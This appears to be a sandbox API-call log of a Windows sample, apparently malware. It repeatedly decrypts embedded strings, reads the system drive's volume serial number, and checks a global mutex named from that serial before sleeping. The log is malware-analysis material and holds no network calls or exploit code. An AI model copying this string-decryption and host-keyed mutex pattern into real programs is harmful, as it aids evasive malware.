[0159.709] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0159.709] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0159.709] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0159.709] CryptDestroyKey (hKey=0x29c020) returned 1 [0159.709] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0159.709] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0159.709] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0159.709] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0159.709] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0159.709] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0159.709] CryptDestroyKey (hKey=0x29c020) returned 1 [0159.709] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0159.709] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0159.709] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0159.709] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0159.709] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0159.733] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0159.733] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0159.733] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0159.733] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0159.733] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0159.733] CryptDestroyKey (hKey=0x29c020) returned 1 [0159.733] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0159.733] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0159.733] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0159.733] CloseHandle (hObject=0x1c0) returned 1 [0159.733] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0159.733] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0159.733] Sleep (dwMilliseconds=0x3e8) [0160.756] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0160.757] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0160.757] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0160.757] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0160.757] CryptDestroyKey (hKey=0x29c020) returned 1 [0160.757] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0160.757] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0160.757] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0160.757] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0160.757] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0160.757] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0160.757] CryptDestroyKey (hKey=0x29c020) returned 1 [0160.757] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0160.757] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0160.757] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0160.757] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0160.757] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0160.757] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0160.757] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0160.757] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0160.757] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0160.757] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0160.757] CryptDestroyKey (hKey=0x29c020) returned 1 [0160.757] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0160.757] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0160.757] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0160.757] CloseHandle (hObject=0x1c0) returned 1 [0160.757] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0160.758] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0160.758] Sleep (dwMilliseconds=0x3e8) [0162.220] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0162.220] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0162.220] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0162.220] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0162.220] CryptDestroyKey (hKey=0x29c020) returned 1 [0162.220] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0162.220] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0162.220] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0162.220] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0162.220] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0162.220] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0162.220] CryptDestroyKey (hKey=0x29c020) returned 1 [0162.220] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0162.220] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0162.220] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0162.220] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0162.220] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0162.220] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0162.220] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0162.220] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0162.220] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0162.221] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0162.221] CryptDestroyKey (hKey=0x29c020) returned 1 [0162.221] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0162.221] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0162.221] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0162.221] CloseHandle (hObject=0x1c0) returned 1 [0162.221] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0162.221] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0162.221] Sleep (dwMilliseconds=0x3e8) [0163.232] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0163.232] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0163.233] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0163.233] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0163.233] CryptDestroyKey (hKey=0x29c020) returned 1 [0163.233] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0163.233] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0163.233] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0163.233] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0163.233] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0163.233] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0163.233] CryptDestroyKey (hKey=0x29c020) returned 1 [0163.233] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0163.233] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0163.233] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0163.233] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0163.233] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0163.233] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0163.233] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0163.233] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0163.233] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0163.233] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0163.233] CryptDestroyKey (hKey=0x29c020) returned 1 [0163.233] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0163.233] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0163.233] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0163.233] CloseHandle (hObject=0x1c0) returned 1 [0163.233] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0163.233] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0163.233] Sleep (dwMilliseconds=0x3e8) [0164.275] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0164.275] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0164.275] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0164.275] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0164.275] CryptDestroyKey (hKey=0x29c020) returned 1 [0164.275] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0164.275] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0164.275] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0164.275] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0164.275] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0164.275] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0164.275] CryptDestroyKey (hKey=0x29c020) returned 1 [0164.275] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0164.275] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0164.275] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0164.275] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0164.275] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0164.275] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0164.275] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0164.275] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0164.275] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0164.275] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0164.275] CryptDestroyKey (hKey=0x29c020) returned 1 [0164.275] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0164.275] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0164.275] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0164.275] CloseHandle (hObject=0x1c0) returned 1 [0164.275] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0164.276] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0164.276] Sleep (dwMilliseconds=0x3e8) [0165.558] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0165.558] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0165.558] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0165.558] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0165.558] CryptDestroyKey (hKey=0x29c020) returned 1 [0165.558] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0165.558] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0165.558] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0165.558] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0165.558] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0165.558] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0165.558] CryptDestroyKey (hKey=0x29c020) returned 1 [0165.558] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0165.558] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0165.558] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0165.558] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0165.558] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0165.558] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0165.558] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0165.558] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0165.558] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0165.559] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0165.559] CryptDestroyKey (hKey=0x29c020) returned 1 [0165.559] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0165.559] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0165.559] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 [0165.559] CloseHandle (hObject=0x1c0) returned 1 [0165.559] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0165.559] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0165.559] Sleep (dwMilliseconds=0x3e8) [0166.575] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x20) returned 0x1db5778 [0166.575] CryptImportKey (in: hProv=0x254d70, pbData=0x200fad8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb40 | out: phKey=0x200fb40*=0x29c020) returned 1 [0166.575] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb28, dwFlags=0x0) returned 1 [0166.575] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db5778, pdwDataLen=0x200faf4 | out: pbData=0x1db5778, pdwDataLen=0x200faf4) returned 1 [0166.575] CryptDestroyKey (hKey=0x29c020) returned 1 [0166.575] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x1e) returned 0x1db54e8 [0166.575] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x1e) returned 0x1db5510 [0166.575] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x90) returned 0x1db16d0 [0166.575] CryptImportKey (in: hProv=0x254d70, pbData=0x200fab0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb18 | out: phKey=0x200fb18*=0x29c020) returned 1 [0166.575] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb00, dwFlags=0x0) returned 1 [0166.575] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db16d0, pdwDataLen=0x200facc | out: pbData=0x1db16d0, pdwDataLen=0x200facc) returned 1 [0166.575] CryptDestroyKey (hKey=0x29c020) returned 1 [0166.575] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db16d0 | out: hHeap=0x1db0000) returned 1 [0166.575] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x1db54e8, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0166.575] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5510 | out: hHeap=0x1db0000) returned 1 [0166.575] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db5778 | out: hHeap=0x1db0000) returned 1 [0166.575] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x200fb80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x200fb80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0166.575] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x1db54e8 | out: hHeap=0x1db0000) returned 1 [0166.575] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x40) returned 0x1db54e8 [0166.575] CryptImportKey (in: hProv=0x254d70, pbData=0x200fb0c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x200fb74 | out: phKey=0x200fb74*=0x29c020) returned 1 [0166.575] CryptSetKeyParam (hKey=0x29c020, dwParam=0x1, pbData=0x200fb5c, dwFlags=0x0) returned 1 [0166.575] CryptDecrypt (in: hKey=0x29c020, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1db54e8, pdwDataLen=0x200fb28 | out: pbData=0x1db54e8, pdwDataLen=0x200fb28) returned 1 [0166.575] CryptDestroyKey (hKey=0x29c020) returned 1 [0166.575] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x8, Size=0x34) returned 0x1db16d0 [0166.575] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x1c0 [0166.576] WaitForSingleObject (hHandle=0x1c0, dwMilliseconds=0x0) returned 0x102 